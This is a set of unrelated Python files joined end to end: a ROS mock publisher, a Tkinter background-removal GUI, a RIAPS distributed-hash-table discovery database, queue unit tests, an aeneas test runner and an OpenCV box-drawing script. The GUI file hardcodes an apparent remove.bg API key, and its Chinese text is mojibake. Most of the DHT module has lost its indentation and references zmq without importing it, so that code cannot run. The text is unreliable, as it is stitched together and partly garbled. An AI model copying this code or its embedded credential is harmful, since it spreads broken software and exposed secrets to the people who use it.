        self.publisher = rospy.Publisher(topic_name, Drive, queue_size=1)
        self.subscriber = rospy.Subscriber('/set_drive_data', Drive, self.set_speed)
        self.rate = rospy.Rate(frequency)
        # Six wheels, all initially moving.
        self.wheel_speeds = [1, 1, 1, 1, 1, 1]

    def get_wheel_speeds(self):
        """Return the list of six current wheel speeds."""
        return self.wheel_speeds

    def set_speed(self, data):
        """Subscriber callback: record new wheel speeds and update stop_flag."""
        global stop_flag
        self.wheel_speeds = [data.wheel0, data.wheel1, data.wheel2,
                             data.wheel3, data.wheel4, data.wheel5]
        # Idiom fix: replaced reduce(lambda a, b: a and b, map(...)) with the
        # equivalent built-in all(). Stop only when every wheel is 0.
        stop_flag = all(speed == 0 for speed in self.wheel_speeds)

    def talker(self):
        """Publish the wheel speeds as Drive messages until ROS shuts down."""
        msg = Drive()
        while not rospy.is_shutdown():
            wheel_speeds = self.get_wheel_speeds()
            msg.wheel0 = wheel_speeds[0]
            msg.wheel1 = wheel_speeds[1]
            msg.wheel2 = wheel_speeds[2]
            msg.wheel3 = wheel_speeds[3]
            msg.wheel4 = wheel_speeds[4]
            msg.wheel5 = wheel_speeds[5]
            # TODO: determine what are and if we need the other fields
            self.publisher.publish(msg)
            self.rate.sleep()
if __name__ == '__main__':
    try:
        rospy.init_node('mock_data', anonymous=False)
        # Run each publisher on its own daemon thread so rospy.spin() can
        # own the main thread and the process exits cleanly on shutdown.
        navigation_data = NavData()
        thread_navigation_data = Thread(target=navigation_data.talker)
        thread_navigation_data.daemon = True
        thread_navigation_data.start()
        drive_data = DriveData()
        thread_drive_data = Thread(target=drive_data.talker)
        thread_drive_data.daemon = True
        thread_drive_data.start()
        rospy.spin()
    except rospy.ROSInterruptException:
        # Fixed the misspelled message (was 'ROSPY EXCETION').
        print('ROSPY EXCEPTION')
|
import os
from tkinter import Tk, Menu, Label, Button
from tkinter.filedialog import askopenfilenames
from tkinter.messagebox import showinfo
# from ๅฎ็จไธปไนๅญฆPython.ๆ ๅพ.ๆ ้ค่ๆฏ import remove_bg
from removebg import RemoveBg
rmbg = RemoveBg('GiQrvx9AuuS6DH2Svh3JBfVK', 'error.log')
def remove_bg(img_path):
    """Strip the background from the image at img_path via the remove.bg API."""
    rmbg.remove_background_from_img_file(img_path)
IMGPATH = ''
class GUI(object):
    """Tkinter window for removing image backgrounds via the remove.bg API.

    NOTE(review): the CJK comments and string literals in this class are
    mojibake in the extracted source (some split across lines); the literals
    are reproduced as found, comments are rewritten in English.
    """

    def __init__(self, window):
        """Build the window: a path label and two action buttons."""
        self.window = window
        self.window.title('ๅป้คๅพ็่ๆฏ')
        self.window.geometry('300x200')
        menubar = Menu(self.window)
        # Help menu (built but never attached to the window's menubar).
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_command(label='ๅธฎๅฉ', command=self.helpme)
        filemenu.add_separator()
        # Label that displays the selected file paths.
        self.l = Label(window, text='')
        self.l.pack(padx=5, pady=10)
        # Button: pick image files.
        btn1 = Button(window, text='้ๆฉ็ง็', width=15, height=2, command=self.get_img)
        btn1.pack()
        # Button: run background removal on the selection.
        self.send_btn = Button(window, text='ๅป้ค่ๆฏ', width=15, height=2, command=self.gen_img)
        self.send_btn.pack()

    def helpme(self):
        """Show the help/contact dialog."""
        showinfo('ๅธฎๅฉ', '่ฏทๅณๆณจๅฌไผๅท๏ผ่็ณปไฝ่')

    def get_img(self):
        """Ask the user for image files and remember their paths in IMGPATH."""
        global IMGPATH
        filenames = askopenfilenames(filetypes=(('jpeg img', '*.jpeg'),
                                                ('jpg img', '*.jpg'), ('png img', "*.png")
                                                ))
        if len(filenames) > 0:
            fnlist = [fn for fn in filenames]
            fnstr = '\n'.join(fnlist)
            self.l.config(text=fnstr)
            IMGPATH = fnlist
        else:
            self.l.config(text='็ฎๅๆฒกๆ้ๆฉไปปไฝๅพ็ๆไปถ')

    def gen_img(self):
        """Strip the background from every selected image and report the paths."""
        global IMGPATH
        respathlist = []
        for imgpath in IMGPATH:
            filepath, tempfilename = os.path.split(imgpath)
            filename, extension = os.path.splitext(tempfilename)
            remove_bg(imgpath)
            respathlist.append(imgpath)
        respath = ' '.join(respathlist)
        showinfo('ๅฎๆ็ๆ', f'ๅพ็ๅค็ๅฎๆ๏ผ่ทฏๅพไธบ: {respath}')
# Build the window and hand it to the GUI controller.
window = Tk()
GUI(window)
# Enter the Tk event loop — must run after all widgets are created.
window.mainloop()
'''
Discovery server database interface
Created on Oct 19, 2016
@author: riaps
'''
import typing
import re
import sys
import functools
import copy
import threading
import os
from os.path import join
from threading import RLock
import parse
import sched,time
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_OAEP
from Cryptodome.Hash import SHA256
import opendht as dht
import ctypes
import czmq
import zyre
from zyre import Zyre, ZyreEvent
import lmdb
try:
import cPickle
pickle = cPickle
except:
cPickle = None
import pickle
from riaps.consts.defs import *
from riaps.run.exc import *
from riaps.utils.ifaces import get_random_port
from riaps.utils.config import Config
from .dbase import DiscoDbase
import logging
class DhtPeerMon(threading.Thread):
def __init__(self,context,hostAddress,riapsHome,dht,dhtPort):
threading.Thread.__init__(self,daemon=False)
self.logger = logging.getLogger(__name__)
self.context = context
self.hostAddress = hostAddress
self.riapsHome = riapsHome
self.control = None
self.dht = dht
self.dhtPort = dhtPort
self.peers = { } # uuid : address - all peers
self.peerGroup = set() # set(uuid) of peer group members
self.uuid = None
self.logger.info('DhtPeerMon:__inited__')
def setup(self):
self.logger.info('DhtPeerMon:setup()')
self.control = self.context.socket(zmq.PAIR)
self.control.bind(const.discoDhtPeerMonEndpoint)
return self.control
def terminate(self):
if self.control != None:
self.control.send_pyobj(('stop',))
else:
self.setup()
time.sleep(0.1)
self.control.send_pyobj(('stop',))
def peerHeaderKey(self,ipAddress):
return b'riaps_disco@' + ipAddress.encode('utf-8')
PEERMARK = b'CAFE'
PEERGROUP = b'riaps_disco'
PEERGROUP_STR = PEERGROUP.decode('utf-8')
def run(self):
self.zyre = Zyre(None)
if self.logger.level == logging.DEBUG:
self.zyre.set_verbose()
else:
pass
self.uuid = self.zyre.uuid()
self.zyre.set_interface(Config.NIC_NAME.encode('utf-8'))
if Config.SECURITY:
certFile = os.path.join(self.riapsHome,"keys",const.zmqCertificate)
cert = czmq.Zcert.load(ctypes.c_char_p(certFile.encode('utf-8')))
self.zyre.set_zcert(cert)
self.zyre.set_evasive_timeout(const.peerEvasiveTimeout)
self.zyre.set_expired_timeout(const.peerExpiredTimeout)
self.zyre.set_header(self.peerHeaderKey(self.hostAddress),self.PEERMARK)
self.command = self.context.socket(zmq.PAIR)
self.command.connect(const.discoDhtPeerMonEndpoint)
self.zyre.start()
self.zyre.join(self.PEERGROUP)
self.zyreSocket = self.zyre.socket()
self.poller = czmq.Zpoller(zyre.c_void_p(self.command.underlying),self.zyreSocket,0)
while True:
reader = self.poller.wait(-1) # Wait forever
if self.poller.terminated():
self.logger.info("DhtPeerMon.run - poller terminated")
break
if type(reader) == zyre.c_void_p and reader.value == self.command.underlying:
msg = self.command.recv_pyobj()
self.logger.info('DhtPeerMon.run - command: %s' % str(msg))
cmd = msg[0]
if cmd == 'stop':
break
else:
pass # Should be error
elif reader == self.zyreSocket:
event = ZyreEvent(self.zyre)
eType = event.type()
_pName = event.peer_name()
pUUID = event.peer_uuid()
pAddr = event.peer_addr()
group = event.group()
_headers = event.headers()
msg = event.get_msg()
# if eType != b'EVASIVE':
# print("# %s %s %s %s %s %s %s"
# % (str(eType),str(_pName),str(pUUID),str(pAddr),
# str(group),str(_headers),str(msg)))
if eType == b'ENTER':
self.logger.info("DhtPeerMon.ENTER %s from %s" % (pUUID.decode('utf-8'),pAddr.decode('utf-8')))
try:
pAddrStr = pAddr.decode('UTF-8')
(peerIp,peerPort) = parse.parse("tcp://{}:{}",pAddrStr)
peerHeaderKey = self.peerHeaderKey(peerIp)
_value = _headers.lookup(peerHeaderKey)
if (_value):
try:
value = ctypes.cast(_value,ctypes.c_char_p).value
assert value == self.PEERMARK
self.peers[pUUID] = (peerIp,peerPort)
self.logger.info("DhtPeerMon.ENTER valid peer")
except:
self.logger.info("DhtPeerMon.ENTER header value mismatch")
else:
self.logger.info("DhtPeerMon.ENTER header key mismatch")
except:
self.logger.info("DhtPeerMon.ENTER peer addr parsing error")
elif pUUID not in self.peers: # Skip the rest if this is not a peer
continue
elif eType == b'JOIN':
groupName = group.decode()
peer = pUUID
self.logger.info("DhtPeerMon.JOIN %s from %s" % (groupName, pUUID.decode('utf-8')))
if group != self.PEERGROUP:
self.logger.info("DhtPeerMon.JOIN another group")
pass
else:
self.peerGroup.add(peer)
self.zyre.whispers(peer,("%s://%d" % (self.PEERGROUP_STR,self.dhtPort)).encode('utf-8'))
elif eType == b'SHOUT' or eType == b'WHISPER':
arg = msg.popstr().decode()
self.logger.info("DhtPeerMon.SHOUT %s = %s " % (pUUID.decode('utf-8'), arg))
try:
# pAddrStr = pAddr.decode('UTF-8')
# (peerIp,_peerPort) = parse.parse("tcp://{}:{}",pAddrStr)
# assert peerIp == self.peers[pUUID]
(peerIp,peerPort) = self.peers[pUUID]
(peerDhtPort,) = parse.parse("%s://{}" % self.PEERGROUP_STR,arg)
if peerDhtPort:
self.logger.info("DhtPeerMon.bootstrap %s:%s" % (peerIp,peerDhtPort))
self.dht.bootstrap(str(peerIp),str(peerDhtPort))
except:
self.logger.error("DhtPeerMon.bootstrap failed")
elif eType == b'LEAVE':
groupName = group.decode()
self.logger.info("DhtPeerMon.LEAVE %s from %s" % (pUUID.decode('utf-8'),groupName))
if group != self.PEERGROUP:
self.logger.info("DhtPeerMon.LEAVE another group")
pass
else:
self.peerGroup.discard(pUUID)
elif eType == b'EXIT':
self.logger.info("DhtPeerMon.EXIT %s " % (str(pUUID)))
if pUUID in self.peers:
del self.peers[pUUID]
self.peerGroup.discard(pUUID)
else:
pass
self.command.close()
self.zyre.leave(self.PEERGROUP)
self.zyre.stop()
class DhtBackup(object):
'''
Dht registration backup database.
The database is a collection of key:str -> [value:bytes] pairs
'''
RIAPSAPPS = 'RIAPSAPPS'
def __init__(self):
'''
Constructor
'''
self.logger = logging.getLogger(__name__)
self.create = False
self.dbase = None
appFolder = os.getenv(DhtBackup.RIAPSAPPS, './')
dbPath = join(appFolder,const.regDb)
mapSize = const.appDbSize * 1024 * 1024
if os.path.exists(dbPath) and not os.access(dbPath,os.W_OK):
raise BuildError("regDb is not writeable")
while True:
try:
self.dbase = lmdb.open(dbPath,
map_size = mapSize,
metasync=True,
sync=True,
map_async=False,
mode=0o700,
readahead=True,
create = self.create,
writemap=False)
self.logger.info('regDb opened (create = %s)' % str(self.create))
break
except lmdb.Error:
self.create = True
except:
raise
def closeDbase(self):
with self.dbase.begin() as txn:
with txn.cursor() as curs:
go = True
while go:
go = curs.delete()
self.dbase.close()
self.logger.info('regDb closed')
@staticmethod
def unpickle(vl):
res = pickle.loads(vl)
return res if res else []
def getAllKeyValues(self):
with self.dbase.begin() as txn:
raw = list(txn.cursor().iternext())
return [(k.decode('UTF-8'),[v for v in self.unpickle(vl)] if vl else [])
for (k,vl) in raw]
def clearDbase(self):
with self.dbase.begin() as txn:
with txn.cursor() as curs:
go = True
while go: go = curs.delete()
def getKeyValues(self,key,default = None):
assert self.dbase != None
value = default
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin() as txn:
_value = txn.get(key)
if _value != None:
value = self.unpickle(_value)
return value
def addKeyValue(self,key,value):
assert self.dbase != None
res = False
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin(write=True) as txn:
values = []
_values = txn.get(key)
if _values != None:
values = self.unpickle(_values)
values += [value]
_values = pickle.dumps(values)
res = txn.put(key,_values)
return res
def delKey(self,key):
assert self.dbase != None
res = False
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin(write=True) as txn:
res = txn.delete(key)
return res
def delKeyValue(self,key,value):
assert self.dbase != None
res = False
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin(write=True) as txn:
values = []
_values = txn.get(key)
if _values != None:
values = self.unpickle(_values)
values = values.remove(value) if value in values else values
_values = pickle.dumps(values)
res = txn.put(key,_values)
return res
class DhtDbase(DiscoDbase):
'''
Discovery service database implemented using opendht
'''
def __init__(self,context_,hostAddress,dbaseLoc):
'''
Construct the dht object.
'''
super().__init__(context_, dbaseLoc)
self.logger = logging.getLogger(__name__)
global theDiscoBase
theDiscoBase = self
self.context = context_
self.hostAddress = hostAddress
self.root = dbaseLoc
self.dht = None
self.dhtPort = None
self.updates = []
self.updateLock = RLock()
self.clients = { }
self.listeners = { }
self.riapsHome = os.getenv('RIAPSHOME', './')
self.republisher = sched.scheduler(time.time,time.sleep)
self.republishMap = { }
self.republisherStart = threading.Event()
self.republisherThread = threading.Thread(name='dhtRepublisher',
target=self.dhtRepublishWorker,
daemon=False)
self.republisherStop = False
self.republishLock = RLock()
self.deletedMap = { }
self.regDb = DhtBackup()
self.private_key = None
self.cipher_rsa = None
if Config.SECURITY:
private_key_name = join(self.riapsHome,"keys/" + str(const.ctrlPrivateKey))
with open(private_key_name, 'rb') as f: key = f.read()
self.private_key = RSA.importKey(key)
self.cipher_rsa = PKCS1_OAEP.new(self.private_key)
self.peerMon = None
def cleanupRegDb(self):
keyValues = self.regDb.getAllKeyValues()
if keyValues:
self.logger.info("cleanup regdb")
for (key,values) in keyValues:
for value in values:
self.dhtRemove(key,value)
self.regDb.clearDbase()
def start(self):
'''
Start the database: connect to the root dht
'''
if self.root != None:
pair = re.split(":",self.root) # Root host, probably run by control
bootHost = str(pair[0])
bootPort = int(pair[1])
else:
bootHost = const.discoDhtHost # Default host,
bootPort = const.discoDhtPort
try:
self.logger.info("launching dht")
config = dht.DhtConfig()
config.setBootstrapMode(True)
if Config.SECURITY:
config.setIdentity(dht.Identity.generate("riaps-disco"))
self.dht = dht.DhtRunner()
self.dhtPort = get_random_port()
self.dht.run(port=self.dhtPort,config=config) # Run on a random, free port
except Exception:
raise DatabaseError("dht.start: %s" % sys.exc_info()[0])
if const.discoDhtBoot and bootHost and bootPort:
try:
self.logger.info("dht.bootstrap on %s:%s" % (str(bootHost),str(bootPort)))
self.dht.bootstrap(str(bootHost),str(bootPort))
except Exception:
raise DatabaseError("dht.bootstrap: %s" % sys.exc_info()[0])
# Create and start peer monitor
self.peerMon = DhtPeerMon(self.context,self.hostAddress,self.riapsHome,self.dht,self.dhtPort)
self.peerMon.setup()
self.peerMon.start()
time.sleep(0.1)
self.cleanupRegDb() # If something in the backup db, discard from the dht
self.republisherThread.start() # Start republisher
def fetchUpdates(self):
'''
Check and fetch the updated values of the subscribed keys if any
'''
with self.updateLock:
if len(self.updates) == 0: return []
try:
res = []
for (key,value) in set(self.updates):
clients = self.clients.get(key,None)
if clients: res.append((key,value,clients))
self.updates = []
return res
except Exception:
raise DatabaseError("dht: fetch %s" % sys.exc_info()[0])
except OSError:
raise DatabaseError("OS error")
def encryptData(self,data : bytes) -> bytes:
'''
Encrypt data with RSA cipher, if security is enabled
'''
return self.cipher_rsa.encrypt(data) if Config.SECURITY else data
def decryptData(self,data : bytes) -> bytes:
'''
Decrypt data with RSA cipher, if security is enabled
'''
return self.cipher_rsa.decrypt(data) if Config.SECURITY else data
def dhtValue(self,value : str) -> dht.Value:
'''
Convert a string value to bytes (wiht optional encryption) then to a dht.Value
'''
return dht.Value(self.encryptData(value.encode('UTF-8')))
def strValue(self,value : dht.Value) -> str:
'''
Retrieve the raw bytes from a dht.Value, optionally decrypt it, then covert it into a str.
'''
return self.decryptData(value.data).decode('UTF-8')
@staticmethod
def delValue(value: str) -> str:
return '-' + value
@staticmethod
def orgValue(value : str) -> str:
return value[1:] if value[0] == '-' else value
@staticmethod
def isDelValue(value: str) -> bool:
return value[0] == '-'
@staticmethod
def filterDelValues(values : [str]) -> [str]:
out = [v[1:] for v in values if v[0] == '-']
return [v for v in values if v[0] != '-' and v not in out]
def dhtGet(self,key : str) -> [str]:
'''
Retrieve values belonging to a key. Lowest level op.
'''
def wrapper(gen): # Filter values where decryption fails
while True:
try:
yield next(gen)
except StopIteration:
break
except ValueError:
pass
keyhash = dht.InfoHash.get(key)
dhtValues = self.dht.get(keyhash)
values = list(wrapper(map(self.strValue,dhtValues)))
self.logger.info('dhtGet[%s]: %r' % (key,values))
return values
def dhtPut(self,key : str,value : str) -> bool:
'''
Add a value to key. Lowest level op. Note: one key may have multiple values.
'''
keyhash = dht.InfoHash.get(key)
res = self.dht.put(keyhash,self.dhtValue(value))
self.logger.info('dhtPut[%s]:= %r (%r)' % (key,value,res))
return res
def dhtValueCallback(self,key: str, value : bytes, expired : bool) -> bool:
'''
ValueCallback - called when a key's value get updated.
'''
with self.updateLock:
try:
value_ = self.strValue(value)
except ValueError:
self.logger.error('dhtValueCallback[%s]: <INVALID>(%r)' % (key,expired))
return True
self.logger.info('dhtValueCallback[%s]: %r(%r)' % (key,value_,expired))
if expired or self.isDelValue(value_) or \
(key,value_) in self.republishMap or \
self.deletedMap.get(key,None) == value_:
pass
else:
self.updates += [(key,value_)]
if expired or self.isDelValue(value_):
_value = self.orgValue(value_)
self.deletedMap[key] = _value
self.updates = [(k,v) for (k,v) in self.updates if k != key and v != _value]
return True
def dhtListen(self,key):
'''
Set up a listener for the key.
The listener will call the ValueCallback with the key + other
arguments supplied by dht.
Return a listener token.
'''
keyhash = dht.InfoHash.get(key)
token = self.dht.listen(keyhash,
functools.partial(self.dhtValueCallback,key))
return token
def dhtRemove(self,key,value):
'''
Remove a specific k/v pair from the dht.
Because we cannot delete it, we add a 'deleted' version of the value to the key.
The original k/v will eventually expire, because it will not be republished.
'''
self.logger.info('dhtRemove[%s]=%r' % (key,value))
values = self.dhtGet(key)
if value in values:
_res = self.dhtPut(key,self.delValue(value))
self.deletedMap[key] = value
return list(set(values) - set([value]))
def dhtAddClient(self,key,client):
'''
Add a client to the key. Clients are local service clients
(app/actor/component/ports) that need to connect to the providers.
'''
self.clients[key] = list(set(self.clients.get(key,[]) + [client]))
if key not in self.listeners:
self.listeners[key] = self.dhtListen(key)
def dhtDelClient(self,key,client):
'''
'''
self.logger.info('dhtdelClient(%s,%r)' % (key,client))
listener = self.listeners.get(key,None)
if listener:
self.dht.cancelListen(listener)
del self.listeners[key]
if client in self.clients.get(key,[]):
self.clients[key].remove(client)
def dhtDelete(self,key):
'''
Delete all the values of a key.
Cancel the listener (if any), mark all values as deleted
'''
self.logger.info('dhtDelete[%s]' % (key,))
listener = self.listeners.get(key,None)
if listener:
self.dht.cancelListen(listener)
del self.listeners[key]
clients = self.clients.get(key,[])
if clients: del self.clients[key]
values = self.dhtGet(key)
for value in values:
_res = self.dhtPut(key,self.delValue(value))
self.deletedMap[key] = value
return values
def dhtRepublishWorker(self):
'''
Worker thread that runs the 'republisher' scheduler.
'''
while True:
self.republisherStart.wait() # Wait for re(start)
self.republisher.run() # Run scheduler
self.republisherStart.clear()
if self.republisherStop: break # Stop when flag is set
self.logger.info('republisher cycle')
def dhtRepublish(self,key,value):
'''
Do the actual republishing. Called by the scheduler.
'''
self.logger.info('dhtRepublish[%s]=%r' % (key,value))
if self.republisherStop: return
with self.republishLock:
event = self.republishMap.get((key,value),None) # Check if this republisher is still active
if event:
self.dhtPut(key,value) # Republish k/v pair on the dht
self.republishMap[(key,value)] = \
self.republisher.enter(const.discoDhtRepublishTimeout,
1,
self.dhtRepublish,[key,value]) # Re-register for the next cycle.
def addToRepublish(self,key,value):
'''
Add a k/v pair to the republisher
'''
self.logger.info('dhtAddToRepublish[%s]=%r' % (key,value))
with self.republishLock:
event = self.republisher.enter(const.discoDhtRepublishTimeout,
1,
self.dhtRepublish,
[key,value])
self.republishMap[(key,value)] = event
self.republisherStart.set()
def delFromRepublish(self,key,value):
    '''
    Remove a k/v pair from the republisher.
    Cancels the pending scheduler event and forgets the pair.
    '''
    self.logger.info('dhtDelFromRepublish[%s]=%r' % (key,value))
    with self.republishLock:
        event = self.republishMap.get((key,value),None)
        if event:
            self.republisher.cancel(event)
            del self.republishMap[(key,value)]
def delFromRepublishAll(self,key,values):
    '''
    Remove all k/v pair/s from the republisher.
    Same per-pair logic as delFromRepublish, but under a single lock
    acquisition for the whole batch.
    '''
    self.logger.info('dhtRemoveFromRepublish[%s]=%r' % (key,str(values)))
    with self.republishLock:
        for value in values:
            event = self.republishMap.get((key,value),None)
            if event:
                self.republisher.cancel(event)
                del self.republishMap[(key,value)]
def insert(self,key:str,value:str) -> [str]:
    '''
    Insert value under key and return list of clients of value (if any).
    A key may have multiple values associated with it.
    Raises DatabaseError on any failure.
    '''
    assert self.dht is not None
    self.logger.info("dht.insert[%r] := %r" % (key,value))
    try:
        _values = self.dhtGet(key)
        clientsToNotify = []
        if value not in _values:
            _res = self.dhtPut(key,value)
            self.regDb.addKeyValue(key, value) # Save k/v into backup db
            self.addToRepublish(key,value) # Add k/v to republisher
            clientsToNotify = self.clients.get(key,[]) # Return interested clients
        return clientsToNotify
    except OSError:
        # BUG FIX: OSError is a subclass of Exception, so this handler was
        # unreachable when it followed the generic one; it must come first.
        raise DatabaseError("OS error")
    except Exception:
        raise DatabaseError("dht.insert: %s" % sys.exc_info()[0])
def fetch(self,key:str,client:str) -> [str]:
    '''
    Fetch value(s) under key.
    Retrieve values, remove deleted values from result, add client to list
    of clients interested in updates.
    Raises DatabaseError on any failure.
    '''
    self.logger.info("dht.fetch[%r] -> %r" % (key,client))
    try:
        self.dhtAddClient(key,client)
        values = self.filterDelValues(self.dhtGet(key))
        self.logger.info("dht.fetch[%r] = %r" % (key,values))
        return values
    except OSError:
        # BUG FIX: OSError must precede the generic Exception handler,
        # otherwise this branch can never run (OSError subclasses Exception).
        raise DatabaseError("OS error")
    except Exception:
        raise DatabaseError("dht.fetch: %s" % sys.exc_info()[0])
def remove(self,key:str,value:str) -> [str]:
    '''
    Remove value from values under key.
    Drops the pair from the republisher and the backup db, then removes it
    on the dht; returns the remaining values.
    Raises DatabaseError on any failure.
    '''
    self.logger.info("dht.remove[%r]:%r" % (key,value))
    try:
        self.delFromRepublish(key,value) # Delete k/v from republisher
        self.regDb.delKeyValue(key, value) # Delete k/v from db
        values = self.dhtRemove(key,value)
        return values
    except OSError:
        # BUG FIX: must precede the generic Exception handler to be reachable.
        raise DatabaseError("OS error")
    except Exception:
        raise DatabaseError("dht.remove: %s" % sys.exc_info()[0])
def detach(self, key:str, target:str):
    '''
    Detach actor (updates) from keys
    Stops delivering update notifications for *key* to *target*.
    '''
    self.logger.info("dht.detach: %s : %r " % (key,target))
    self.dhtDelClient(key,target)
def terminate(self):
    # Shut down persistence, republisher worker, peer monitor and the dht.
    self.regDb.closeDbase()
    self.republisherStop = True
    if self.peerMon: self.peerMon.terminate()
    if self.dht:
        # NOTE(review): join() before shutdown() looks reversed -- confirm
        # the dht client's expected teardown order.
        self.dht.join()
        self.dht.shutdown()
|
import unittest
from data_structures.queue.queue import Queue
class TestQueue(unittest.TestCase):
    """Unit tests for the fixed-capacity Queue implementation."""

    def test_has_more(self):
        """has_more() is False when empty and True while items remain."""
        size = 10
        queue = Queue(capacity=size)
        self.assertEqual(False, queue.has_more())
        for item in range(size):
            queue.enqueue(item)
        self.assertEqual(True, queue.has_more())
        for _ in range(size):
            self.assertEqual(True, queue.has_more())
            queue.dequeue()
        self.assertEqual(False, queue.has_more())

    def test_queue_dequeue(self):
        """Items are dequeued in FIFO order."""
        size = 10
        queue = Queue(capacity=size)
        for item in range(size):
            queue.enqueue(item)
        for expected in range(size):
            self.assertEqual(expected, queue.dequeue())

    def test_exception(self):
        """Both overflow and underflow raise."""
        queue = Queue(capacity=1)
        queue.enqueue(1)
        self.assertRaises(Exception, queue.enqueue, (1, ))
        queue.dequeue()
        self.assertRaises(Exception, queue.dequeue)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
# coding=utf-8
# aeneas is a Python/C library and a set of tools
# to automagically synchronize audio and text (aka forced alignment)
#
# Copyright (C) 2012-2013, Alberto Pettarin (www.albertopettarin.it)
# Copyright (C) 2013-2015, ReadBeyond Srl (www.readbeyond.it)
# Copyright (C) 2015-2016, Alberto Pettarin (www.albertopettarin.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Run all unit tests for the aeneas package.
"""
from __future__ import absolute_import
from __future__ import print_function
import glob
import os
import sys
import unittest
__author__ = "Alberto Pettarin"
__email__ = "aeneas@readbeyond.it"
__copyright__ = """
Copyright 2012-2013, Alberto Pettarin (www.albertopettarin.it)
Copyright 2013-2015, ReadBeyond Srl (www.readbeyond.it)
Copyright 2015-2016, Alberto Pettarin (www.albertopettarin.it)
"""
__license__ = "GNU AGPL 3"
__status__ = "Production"
__version__ = "1.7.1"
# Directory that holds the aeneas unit tests.
TEST_DIRECTORY = "aeneas/tests"
# Maps each test flavour to (filename glob pattern, filename prefix).
MAP = {
    "fast": ("test_*.py", "test_"),
    "bench": ("bench_test_*.py", "bench_test_"),
    "long": ("long_test_*.py", "long_test_"),
    "net": ("net_test_*.py", "net_test_"),
    "tool": ("tool_test_*.py", "tool_test_")
}
class NOPStream(object):
    """ Stream stub that silently discards writes unless verbose is set. """
    def __init__(self, verbose=False):
        self.verbose = verbose
    def flush(self):
        """ Do nothing (kept for stream-interface compatibility). """
        pass
    def write(self, msg):
        """ Print msg in verbose mode; otherwise drop it. """
        if not self.verbose:
            return
        print(msg)
def main():
    """ Parse CLI flags, discover the selected unit-test files, run each
    file's suite, print an aggregate report, and exit 0 only when every
    test passed. """
    if ("--help" in sys.argv) or ("-h" in sys.argv):
        print("")
        print("Usage: python %s [--bench-tests|--long-tests|--net-tests|--tool-tests] [--sort] [--verbose]" % sys.argv[0])
        print("")
        sys.exit(0)
    sort_tests = ("--sort" in sys.argv) or ("-s" in sys.argv)
    verbose = ("--verbose" in sys.argv) or ("-v" in sys.argv)
    # Select the test flavour; MAP yields (glob pattern, filename prefix).
    if ("--bench-tests" in sys.argv) or ("-b" in sys.argv):
        test_type = "bench"
    elif ("--long-tests" in sys.argv) or ("-l" in sys.argv):
        test_type = "long"
    elif ("--net-tests" in sys.argv) or ("-n" in sys.argv):
        test_type = "net"
    elif ("--tool-tests" in sys.argv) or ("-t" in sys.argv):
        test_type = "tool"
    else:
        test_type = "fast"
    pattern, prefix = MAP[test_type]
    all_files = [os.path.basename(f) for f in glob.glob(os.path.join(TEST_DIRECTORY, pattern))]
    # Positional args (not starting with "-") narrow the selection; bare
    # names are normalized by prepending the prefix and appending ".py".
    cli_files = [arg for arg in sys.argv[1:] if not arg.startswith("-")]
    selected_files = []
    for cli_file in cli_files:
        if not cli_file.startswith(prefix):
            cli_file = prefix + cli_file
        if not cli_file.endswith(".py"):
            cli_file += ".py"
        if cli_file in all_files:
            selected_files.append(cli_file)
    if len(selected_files) == 0:
        # No (valid) names given: run the whole flavour's suite.
        selected_files = all_files
    if sort_tests:
        selected_files = sorted(selected_files)
    verbosity = 0
    if verbose:
        verbosity = 2
    results = {}
    # Discard the runner's own output unless --verbose was requested.
    nop_stream = NOPStream(verbose=verbose)
    for test_file in selected_files:
        print("Running", test_file, "...")
        testsuite = unittest.TestLoader().discover(start_dir=TEST_DIRECTORY, pattern=test_file)
        result = unittest.TextTestRunner(stream=nop_stream, verbosity=verbosity).run(testsuite)
        results[test_file] = {
            "tests": result.testsRun,
            "errors": len(result.errors),
            "failures": len(result.failures)
        }
    total_tests = sum([results[k]["tests"] for k in results])
    total_errors = sum([results[k]["errors"] for k in results])
    total_failures = sum([results[k]["failures"] for k in results])
    print("")
    print("Tests: ", total_tests)
    print("Errors: ", total_errors)
    print("Failures: ", total_failures)
    if total_errors > 0:
        print("")
        print("Errors in the following tests:")
        print("\n".join([key for key in results.keys() if results[key]["errors"] > 0]))
        print("")
    if total_failures > 0:
        print("")
        print("Failures in the following tests:")
        print("\n".join([key for key in results.keys() if results[key]["failures"] > 0]))
        print("")
    print("")
    # Exit status mirrors the aggregate result so CI can consume it.
    if total_errors + total_failures == 0:
        print("[INFO] Tests completed: all passed!")
        print("")
        sys.exit(0)
    else:
        print("[INFO] Tests completed: errors or failures found!")
        print("")
        sys.exit(1)
if __name__ == '__main__':
    main()
|
import cv2

# Images to annotate with detection boxes.
he='/home/zrj/Object_detection/hgo3.0/test1.jpg'
he2='/home/zrj/Object_detection/hgo3.0/test2.jpg'
test=cv2.imread(he)
print(test.shape)
test2=cv2.imread(he2)
print(test2.shape)
# Detections are reported as x1 || y1 || x2 || y2:
# 1 label: c score: tensor(0.9989) 795.8562 || 574.78534 || 1089.9589 || 707.62115
# 2 label: c score: tensor(0.9797) 264.5744 || 394.16583 || 486.82922 || 541.3974
# 3 label: c score: tensor(0.9653) 786.41895 || 729.3984 || 980.4159 || 918.14307
# 4 label: c score: tensor(0.8939) 373.24026 || 520.6371 || 610.83594 || 738.6943
# BUG FIX: cv2.rectangle expects the top-left (x1, y1) and bottom-right
# (x2, y2) corners; the original passed (x1, x2), (y1, y2), drawing the
# boxes in the wrong places.
boxes = [
    ((795, 574), (1089, 707)),
    ((264, 394), (486, 541)),
    ((786, 729), (980, 918)),
    ((373, 520), (610, 738)),
]
for top_left, bottom_right in boxes:
    img2 = cv2.rectangle(test, top_left, bottom_right, (0, 0, 255), 3)
